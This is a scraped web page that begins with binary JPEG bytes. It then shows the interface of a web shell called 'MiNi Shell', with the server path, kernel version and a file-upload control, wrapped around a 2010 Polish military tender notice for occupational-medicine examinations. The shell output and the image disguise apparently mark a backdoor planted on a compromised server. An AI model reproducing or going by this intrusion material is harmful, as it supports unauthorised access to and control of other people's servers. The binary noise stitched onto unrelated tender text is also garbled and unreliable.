JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100118/14706-N-2010.html

<p class="kh_header"><b>Warszawa: WYKONANIE BADAŃ PROFILAKTYCZNYCH,  ZLECONYCH PRZEZ ZAMAWIAJĄCEGO, W ZAKRESIE MEDYCYNY PRACY DLA PRACOWNIKÓW CYWILNYCH I ŻOŁNIERZY ZAWODOWYCH BATALIONU REPREZENTACYJNEGO WP, NR SPRAWY 02/2010/Amb</b><br>
<b>Numer ogłoszenia: 14706 - 2010; data zamieszczenia: 18.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Batalion Reprezentacyjny Wojska Polskiego , ul. Hynka 2, 00-909 Warszawa, woj. mazowieckie, tel. 022 6847206, 6848209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.brepr.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa - podsektor rządowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE BADAŃ PROFILAKTYCZNYCH,  ZLECONYCH PRZEZ ZAMAWIAJĄCEGO, W ZAKRESIE MEDYCYNY PRACY DLA PRACOWNIKÓW CYWILNYCH I ŻOŁNIERZY ZAWODOWYCH BATALIONU REPREZENTACYJNEGO WP, NR SPRAWY 02/2010/Amb.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie badań profilaktycznych, zleconych przez Zamawiającego, w zakresie medycyny pracy dla pracowników cywilnych i żołnierzy zawodowych BRWP, nr sprawy 02/2010/Amb
Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 5 do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	W celu zabezpieczenia podpisania umowy przez wykonawców, każda oferta musi być zabezpieczona wadium w wysokości - 2000,00 PLN. 
2.   Wadium może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących formach:
1)    pieniądzu;
2)   poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)    gwarancjach bankowych;
4)    gwarancjach ubezpieczeniowych;
5)   poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz.1158, z późn. zm.).
3.   Sposób wniesienia wadium:
1)  wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego: Bank NBP o/ Warszawa 87 10101010 0018 2113 9120 0000 z dopiskiem wadium w postępowaniu 02/2010/Amb., a kserokopię potwierdzenia przelewu załączyć do oferty;
2)  pozostałe formy wadium - oryginał należy złożyć w kasie Zamawiającego (budynek SZTABU, I piętro); a kserokopię zamieścić w ofercie.
4.   Wadium należy wnieść przed upływem terminu składania ofert w odpowiedniej wysokości. 
5.   Za skuteczne wniesienie wadium Zamawiający uważa wadium, które w oznaczonym terminie znajdzie się na koncie (kasie) Zamawiającego. 
6.   Wykonawca, którego oferta nie będzie zabezpieczona akceptowaną formą i w odpowiedniej wysokości wadium, zostanie wykluczony.
7.    Zamawiający zwraca niezwłocznie wszystkim wykonawcom wadium, jeżeli:
1)   po wyborze oferty najkorzystniejszej;
2)   po unieważnieniu postępowania, 
 z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, 
z zastrzeżeniem ust. 4a;
3) Wykonawcy, którego oferta została wybrana  jako najkorzystniejsza, Zamawiający zwróci niezwłocznie po zawarciu umowy i wniesieniu zabezpieczenia należytego wykonania umowy.
8.  Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy:
1)   który wycofa ofertę przed upływem terminu składania ofert;
9.  Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 1 (Dz.09. 206.1591), jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
10.  Wadium wniesione w pieniądzu będzie przechowywane na oprocentowanym rachunku bankowym i zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji za przelew na rachunek bankowy wykonawcy.
11.  Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta zostanie wybrana:
1)  odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)   nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3)   zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I.	[Warunki udziału w postępowaniu] O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1.	posiadają uprawnienia i zezwolenia do wykonywania określonej działalności tj. posiadają uprawnienia i realizują zadania podstawowej jednostki medycyny pracy zgodnie z art. 2 (Dz. U. 04.125.1317), lub inne jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub zgodnie z art. 2b ustawy Pzp (Dz.09. 206.1591) polegają na wiedzy i doświadczeniu oraz potencjale technicznym i ludzkim oraz na zdolnościach finansowych innych podmiotów;
3.	W zakresie sytuacji ekonomicznej i finansowej wykonawca składający ofertę oświadczy że: w okresie 3 miesięcy przed upływem terminu składania ofert znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiada w dyspozycji  środki własne lub środki z kredytu obrotowego lub z kredytu odnawialnego lub innego kredytu, lub zdolność kredytową w wysokości, co najmniej 50% wartości składanej oferty , lub w uzasadnionych przypadkach przedstawi inny dokument, który w wystarczający potwierdzi spełnienie opisanego przez Zamawiającego warunku;
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. l i ust. 2  ustawy, a w szczególności nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne; 
5. Wykonawca oświadczy, że spełnia wymagania dotyczące świadczenia usług zdrowotnych zgodnie z przepisami:
1)	ustawy z dnia 8 stycznia 2007 r. o zakładach opieki zdrowotnej (Dz. U. Nr 14, poz. 89 z późn. zm.);
2)	ustawy z dnia 5 grudnia 1996 r. o zawodach lekarza i lekarza dentysty (j.t. Dz. U. z 2008 r. Nr 136, poz. 857);
3)	ustawy z dnia 5 lipca 1996 r. o zawodach pielęgniarki i położnej (j.t. Dz. U. z 2001 r. Nr 57, poz. 602 z późn. zm.);
4)	rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. Nr 69, poz. 332 z późn. zm.);
5)	rozporządzenia Ministra Zdrowia z dnia 7 stycznia 2004 r. w sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia kierowania pojazdami (Dz. U. Nr 2, poz. 15);

II.	[Przesłanki wykluczenia] Zamawiający wykluczy Wykonawcę z postępowania, jeżeli zajdzie jedna z okoliczności wymienionych w art. 24 ust. 1 i 2 ustawy Pzp.

III.	[Sposób oceny spełniania warunków] Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu jeżeli będzie to wynikało z oświadczeń i dokumentów, o których mowa w rozdziale VII złożonych wraz z ofertą. Wykonawca może spełniać albo nie spełniać warunków udziału w postępowaniu, oceny spełniania warunków nie stopniuje się.

IV.	[Wykonawcy wspólnie ubiegający się o zamówienie publiczne] 
1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (art. 23 ustawy).
2. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego.


Uwaga: Oferta składana przez spółki cywilne, ustawowo zdefiniowane art. 860 Kodeksu cywilnego, zgodnie z art. 4 ust. 2 ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej Dz. U. 04.173.poz 1807 z późn. zm.) jest traktowana jako oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (art. 23 Pzp.) i solidarnie za nie odpowiadających (art. 864 Kodeksu cywilnego).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.	Oferta musi zawierać:
1.	Formularz ofertowy - sporządzony zgodnie z załącznikiem nr 1 do SIWZ, zawierający:
1)	ofertę cenową;
2)	oświadczenie dotyczące przedmiotu zamówienia;
3)	oświadczenie dotyczące postanowień SIWZ.
II.	Zamawiający żąda złożenia do oferty niżej wymienionych oświadczeń:
1.	Oświadczenie o spełnieniu warunków w postępowaniu wg wzoru z załącznika nr 2 do SIWZ.

III.	Zamawiający żąda złożenia do oferty niżej wymienionych dokumentów:
1.	Dokumenty potwierdzające, że wykonawca posiada uprawnienia do wykonywania działalności w zakresie obejmującym przedmiot zamówienia: 
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu z udziału  w postępowaniu:
1)	aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust.1 pkt 4 - 9 Prawa zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 Prawa zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

IV.	 Wykonawca zagraniczny
1)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  zamiast dokumentów, o których mowa w dziale III:
A)	ust. 1 pkt 1, ust. 2 pkt 2 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto j ego likwidacji ani nie ogłoszono upadłości, 
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie, 
B)	ust. 2 pkt 1 składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych.
2)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - nie wydaje się dokumentów, o których mowa w pkt. 1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju,  w którym wykonawca ma siedzibę lub miejsce zamieszkania.
3)	Dokumenty, o których mowa w pkt 1 oraz w pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

V.	Wspólny udział wykonawców
1.	Dokumenty i oświadczenia, które muszą być złożone przez każdego z Wykonawców występujących wspólnie:
1)	Oświadczenie wymienione w dziale II ust. 1; 
2)	Dokumenty wymienione w dziale III, ust. 1 pkt 1, ust. 2 pkt 1, 2;
2.	Dokumenty i oświadczenia, które będą sumaryczną danych wszystkich wykonawców występujących wspólnie: 
1)	Dokument pełnomocnictwa wyznaczający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

VI.	 Pełnomocnictwo
Jeżeli oferta podpisana jest przez pełnomocnika, do oferty należy dołączyć dokument pełnomocnictwa, z którego będzie wynikało umocowanie pełnomocnika do złożenia oferty.

VII.	Informacja o podwykonawcach
1.	Zamawiający żąda wskazania w ofercie, w jakim zakresie wykonawca zamierza powierzyć wykonanie zamówienia podwykonawcom z określeniem zakresu prac, potencjału technicznego i ludzkiego oraz zdolności finansowej innych podmiotów. Wykonawca składa w ofercie zakres powierzonych prac podwykonawcy wg wzoru stanowiącego załącznik nr 4 do SIWZ. 
2.	Jeżeli Wykonawca nie zamierza powierzyć podwykonawcy zakresu prac i zamówienie wykona samodzielnie to nie składa oświadczenia wg załącznika nr 4 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.brepr.wp.mil.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BATALION REPREZENTACYJNY WOJSKA POLSKIEGO ul. Franciszka Hynka 2; 00-909 Warszawa 60; Kancelaria Jawna - budynek SZTABU - pokój nr 112 (I piętro), w godz.: od 7:30-10:00 od 12:00-15:30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2010 godzina 09:00, miejsce: BATALION REPREZENTACYJNY WOJSKA POLSKIEGO ul. Franciszka Hynka 2; 00-909 Warszawa 60; Kancelaria Jawna - budynek SZTABU - pokój nr 112 (I piętro), w godz.: od 7:30-10:00 od 12:00-15:30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com